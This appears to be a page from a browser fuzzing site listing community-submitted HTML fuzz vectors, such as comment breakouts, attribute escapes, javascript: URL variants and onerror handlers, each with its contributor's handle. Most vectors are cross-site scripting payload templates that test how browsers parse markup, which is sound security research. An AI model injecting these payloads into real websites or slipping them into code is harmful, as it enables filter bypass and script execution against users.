Featured vector

Safari 0.0
<script src=data:0x2calert(1)></script>

Fuzz vector cloud

5,456,811 Successful fuzzes

Fuzz Vectors

Searching for "HTML"

Your browser identified as

General Crawlers unknown

All vectors

Description Vector Created by
Characters that close a HTML comment 4 <!-- --*chr*> <img src=xxx:x onerror=log(*num*)> --> @irsdl
Characters allowed between event handlers and equal sign <img src="about:blank" onerror*chr*=logChr(*num*)> @peksa
HTML input image tag attributes that run JavaScript <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="image" src="about:blank"> @peksa
HTML input tag attributes that run JavaScript <input *datahtmlattributes*="customLog('*datahtmlattributes*')" type="text"> @peksa
Characters that escape html input tag <input value="" *chr*<script>logChr(*num*)</script> foo="" type="text"> @peksa
Characters that close a HTML comment 0021 <!--*chr*><img src=xxx:x onerror=log(*num*)> --> @matttiko
char after lt and before still valid html <*chr*,script>logChr(*num*);</script> @p_laguna
Characters that can be used to terminate entities in an href <a href="javascript&colon*chr*log(*num*)" id="fuzzelement*num*">test</a> @tifkin_
Characters allowed between and in HTML entities in style attribute <div style="x:expression(l&*chr*#x6F;gChr(*num*))"> @tifkin_
Test iOS html5 <audio controls> <source src="*chr*.*chr*" type="*chr*/*chr*" onerror= log(*num*)> Your browser does not support the audio element. </audio> @kinmenhacker
test for progress <progress value="*num*" max="*num*"></progress> @kinmenhacker
Characters allowed after domain <a href="http://google.com*chr*breakme" id="fuzzelement*num*">test</a> @avlidienbrunn
Characters allowed before http <a href="http://*chr*google.com" id="fuzzelement*num*">test</a> @avlidienbrunn
Characters allowed in between dashes to end html comments <!-- -*chr*-> <script>logChr(*num*)</script> --> @JohnathanKuskos
char after lt still valid html <*chr*a href=x onerror=logChr(*num*)> @ethicalhack3r
characters allowd in html entities <a href="javascript&co*chr*lon;alert(1)" id="fuzzelement*num*">test</a> @insertScript
Entities allowed with no semi colon htmlStr = '<div title="'+*dataentities*.replace(/;/,'')+'">test</div>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.title.length===1) { customLog(*dataentities*); } }catch(e){}; @garethheyes
HTML Entity in between and <img src=xx:xx onerror="&*chr*#X61;lert(*num*);logChr(*num*)"> @MisterJyu
Characters allowed before slashes no protocol <a href="*chr*//google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed inside slashes no protocol <a href="/*chr*/google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of slash 2 <a href="http:*chr**chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of slash <a href="http:*chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed after slash <a href="http:/*chr*/google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed inside http <a href="ht*chr*tp://google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters transformed in expando attributes <div id="fuzzelement*num*" expando*chr*="123">test</div> @garethheyes
Expandos attributes characters removed <div id="fuzzelement*num*" expando*chr*=123>test</div> @garethheyes
Characters allowed instead of forward slash in url <a href="*chr**chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of colon in js url <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Tags that have the onload event <*datahtmlelements* onload="customLog('*datahtmlelements*')">test</*datahtmlelements*> @garethheyes
html dataentities before event handler <img src="x" asdf/="_=" alt=" *dataentities*onerror=logChr(*num*) //"> @testacc40590139
Break out of HTML element from single quoted attribute <img src='xx:x*chr*><img src=xx:x onerror=logChr(*num*)>'> @peksa
Escaped characters that break out of single quote HTML attribute <img src='xx:x\*chr* onerror="logChr(*num*)">'> @peksa
Characters that escape single quoted HTML attributes <img src='xx:x*chr* onerror="logChr(*num*)">'> @peksa
Characters syntactically equivalent to double quote in HTML attributes `"'><img src="#*chr* onerror=log(*num*)> @p_laguna
Characters that break out of script variables <script>x='<*chr*script><img src=xx:xx onerror=logChr(*num*)>';</script> @garethheyes
Characters that close a HTML comment 3 --><!-- -*chr*-> <img src=xxx:x onerror=log(*num*)> --> @DOMXss
Characters that trigger a new attr after new line <img src=1 title= x:xx*chr*/onerror=logChr(*num*)> @garethheyes
Characters ignored in html event handler name <img src=x on*chr*Error="javascript:log(*num*)"/> @mhswende
Characters allowed after ampersand in named character references <a href="javascript&*chr*colon;log(*num*)" id="fuzzelement*num*">test</a> @_cweb
Characters ending HTML closing tags (HTML4) <style></style*chr*<img src="about:blank" onerror=log(*num*)//></style> @0x6D6172696F
Tags and events that execute javascript 2 <*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> @garethheyes
Tags and events that execute javascript <*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*> @garethheyes
Tags that execute onerror <*datahtmlelements* src=1 href=1 onerror="customLog('*datahtmlelements*')"></*datahtmlelements*> @garethheyes
Characters to separate class names in class attributes <div class="foo*num**chr*bar">HELLO</div> <script>document.getElementsByClassName('foo*num*')[0]?log(*num*):0</script> @0x6D6172696F
Characters that close a HTML comment 002 <!--*chr*<img src=xxx:x onerror=log(*num*)> --> @0x6D6172696F
Characters that close HTML tags <script>log(*num*)</script*chr* @0x6D6172696F
Characters allowed after script <script*chr*>log(*num*)</script> @garethheyes
Single character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr*style=color:#FF1133;" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Entity character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="&#x*hex6*;style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Characters syntactically equivalent to single quote in HTML attributes `"'><img src='#*chr* onerror=log(*num*)> @_cweb
Characters breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr**chr*style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Characters before img "'`><*chr*img src=xxx:x onerror=log(*num*)> @garethheyes
Characters before script '`"><*chr*script>log(*num*)</script> @garethheyes
Characters in between protocol in js url <a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed after attribute name `"'><img src=xxx:x onerror*chr*=log(*num*)> @garethheyes
Characters allowed before protocol in js url <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed before colon in js url <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters that close a HTML comment --><!-- --*chr*> <img src=xxx:x onerror=log(*num*)> --> @garethheyes
Characters allowed before attribute name `"'><img src=xxx:x *chr*onerror=log(*num*)> @garethheyes